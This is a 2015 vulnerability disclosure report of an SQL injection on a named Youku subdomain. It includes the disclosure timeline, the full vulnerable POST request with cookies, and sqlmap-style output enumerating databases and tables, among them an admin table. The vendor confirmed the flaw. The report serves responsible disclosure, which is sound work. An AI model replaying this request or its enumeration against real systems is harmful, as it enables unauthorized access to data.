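2015-05-05: Details reported to the vendor; awaiting vendor response
2015-05-05: Vendor confirmed; details disclosed to the vendor only
2015-05-15: Details disclosed to core white hats and experts in related fields
2015-05-25: Details disclosed to regular white hats
2015-06-04: Details disclosed to trainee white hats
2015-06-19: Details disclosed to the public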
SQL injection on a Youku site
Site: allthingshair.youku.com
POST /api/index.php?r=video/submitCategoryIdGetVideoList HTTP/1.1
Host: allthingshair.youku.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __ysuid=1420857555262JT0; _ga=GA1.2.1068351650.1428639210; _acxm=e68d61d2-df37-11e4-8f80-02420f4ad091; Hm_lvt_aef6ec7144c5dc468472f824bcdbbcac=1428639210,1430809766; ykss=106748550f233e3521db0f0d; u=__LOGOUT__; Hm_lpvt_aef6ec7144c5dc468472f824bcdbbcac=1430814038; PHPSESSID=fn2184otgahgh47jqo3ina41u6
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

categoryId=&orderByTime=3&byCountNum=3&pageSize=16&nowPage=1
Parameter: categoryId=
The table "member_wechat" for active record class "MemberWechat" cannot be found in the database.

[16:15:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'allthingshair@%'
current database: 'allthingshair'
available databases [3]:
[*] allthingshair
[*] information_schema
[*] test

Database: allthingshair
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| daily_video_account | 2470    |
| member_youku        | 195     |
| product_list        | 106     |
| video_main_list     | 55      |
| video_minor_list    | 55      |
| attribute_list      | 18      |
| keyword_count       | 15      |
| category_list       | 13      |
| vlogger_list        | 8       |
| hot_topic_video     | 6       |
| subscribe_list      | 1       |
| tbl_admin_user      | 1       |
+---------------------+---------+
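Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-05-05 18:23
Thank you for your attention to Youku security! A fix for this issue has been scheduled!
None yet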